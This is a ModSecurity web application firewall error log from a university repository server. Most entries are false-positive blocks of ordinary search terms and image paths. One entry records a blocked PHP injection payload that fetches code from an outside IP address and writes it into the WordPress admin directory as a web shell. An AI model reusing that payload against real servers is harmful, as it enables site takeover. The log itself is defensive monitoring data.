[Mon Aug 28 15:41:46.042789 2023] [:error] [pid 46370] [client 47.128.27.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/IMAGE_COVER_BM_YUNITA.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxdysCo-f0AALUi9qIAAAAS"]
[Mon Aug 28 15:43:36.760385 2023] [:error] [pid 46286] [client 47.128.31.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Brand Awareness, Kualitas Produk, Keputusan Pembel\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxeOMCo-f0AALTOpPsAAAAO"]
[Mon Aug 28 15:49:56.378186 2023] [:error] [pid 46645] [client 47.128.29.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Mark Laurence ZaMMit\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxftMCo-f0AALY1acgAAAAU"]
[Mon Aug 28 15:49:56.563333 2023] [:error] [pid 46645] [client 47.128.29.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Mark Laurence ZaMMit\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxftMCo-f0AALY1ackAAAAU"]
[Mon Aug 28 15:53:12.972908 2023] [:error] [pid 46660] [client 47.128.31.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/13._Cover_Financial_Accounting_Theory_(7th_Edition).jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxgeMCo-f0AALZEA1QAAAAJ"]
[Mon Aug 28 15:54:02.583020 2023] [:error] [pid 46656] [client 47.128.21.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sadeghi, Sayed Hadi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxgqsCo-f0AALZAYscAAAAc"]
[Mon Aug 28 15:54:22.507699 2023] [:error] [pid 46694] [client 47.128.25.137] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_industry_4.0.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxgvsCo-f0AALZm68MAAAAD"]
[Mon Aug 28 15:55:08.011211 2023] [:error] [pid 46577] [client 47.128.26.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Politics_and_Technology_in_the_Post-Truth_Era.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxg7MCo-f0AALXxYacAAAAK"]
[Mon Aug 28 15:57:29.076177 2023] [:error] [pid 46751] [client 47.128.29.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Cases_on_information_technology.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxhecCo-f0AALafLQMAAAAH"]
[Mon Aug 28 15:58:45.096728 2023] [:error] [pid 46815] [client 47.128.30.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Shinder,  Thomas W\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxhxcCo-f0AALbfrq0AAAAY"]
[Mon Aug 28 16:05:28.545424 2023] [:error] [pid 46855] [client 47.128.20.152] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Loh, Michael\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxjWMCo-f0AALcHEpAAAAAJ"]
[Mon Aug 28 16:09:59.741607 2023] [:error] [pid 47056] [client 47.128.24.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Big Data Analytics\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxkZ8Co-f0AALfQUpQAAAAG"]
[Mon Aug 28 16:14:09.943700 2023] [:error] [pid 47062] [client 47.128.29.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PSYCHOPATS, KILLER\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxlYcCo-f0AALfW0VMAAAAI"]
[Mon Aug 28 16:15:55.974379 2023] [:error] [pid 47122] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOxly8Co-f0AALgS-qIAAAAA"]
[Mon Aug 28 16:17:44.038181 2023] [:error] [pid 47144] [client 47.128.26.168] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SOLIKIN M. JUHRO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxmOMCo-f0AALgoZ3AAAAAR"]
[Mon Aug 28 16:23:13.977746 2023] [:error] [pid 47220] [client 47.128.28.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Davis, Peter T.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxngcCo-f0AALh0BIwAAAAH"]
[Mon Aug 28 16:28:44.271684 2023] [:error] [pid 47262] [client 47.128.29.133] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/1._COVER_Siska_Dwi_Meitasari_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxozMCo-f0AALieaqIAAAAA"]
[Mon Aug 28 16:30:59.259093 2023] [:error] [pid 47311] [client 47.128.17.126] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Laudon, Jane P\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxpU8Co-f0AALjPcYEAAAAD"]
[Mon Aug 28 16:33:22.841469 2023] [:error] [pid 47338] [client 47.128.31.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22AGUNG WIJAYA PUTRA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxp4sCo-f0AALjqDEMAAAAS"]
[Mon Aug 28 16:35:24.496756 2023] [:error] [pid 47334] [client 52.167.144.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nurika Ummiyati\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxqXMCo-f0AALjmCrIAAAAL"]
[Mon Aug 28 16:42:26.547203 2023] [:error] [pid 47586] [client 47.128.21.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Implementation and Practice\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxsAsCo-f0AALni5jgAAAAG"]
[Mon Aug 28 16:47:32.985083 2023] [:error] [pid 47609] [client 47.128.27.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Emotional_enginerring.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxtNMCo-f0AALn51yEAAAAE"]
[Mon Aug 28 16:49:30.250833 2023] [:error] [pid 47858] [client 47.128.19.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Data mining\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxtqsCo-f0AALrypicAAAAS"]
[Mon Aug 28 16:51:03.561132 2023] [:error] [pid 47886] [client 47.128.19.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Jacka, J. Mike\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxuB8Co-f0AALsO8joAAAAJ"]
[Mon Aug 28 16:52:48.766680 2023] [:error] [pid 47881] [client 47.128.29.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Bhardwaj, Amit\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxucMCo-f0AALsJ26sAAAAC"]
[Mon Aug 28 17:07:16.308130 2023] [:error] [pid 48058] [client 47.128.20.239] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Novel_wearable_antennas.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxx1MCo-f0AALu6uukAAAAA"]
[Mon Aug 28 17:11:26.922354 2023] [:error] [pid 48124] [client 47.128.30.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_YUSI_LUSIANSYAH.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxyzsCo-f0AALv8DtkAAAAG"]
[Mon Aug 28 17:13:04.676642 2023] [:error] [pid 48368] [client 52.167.144.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22YAHYANTO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxzMMCo-f0AALzwAHoAAAAC"]
[Mon Aug 28 17:22:09.727659 2023] [:error] [pid 48422] [client 47.128.17.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ballard, Will\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx1UcCo-f0AAL0mZNoAAAAL"]
[Mon Aug 28 17:24:23.843963 2023] [:error] [pid 48622] [client 47.128.22.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22KIYOSAKI,ROBERT T\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx118Co-f0AAL3u9oIAAAAA"]
[Mon Aug 28 17:27:37.586531 2023] [:error] [pid 48643] [client 47.128.24.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Stepanek, George\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx2mcCo-f0AAL4DOfcAAAAM"]
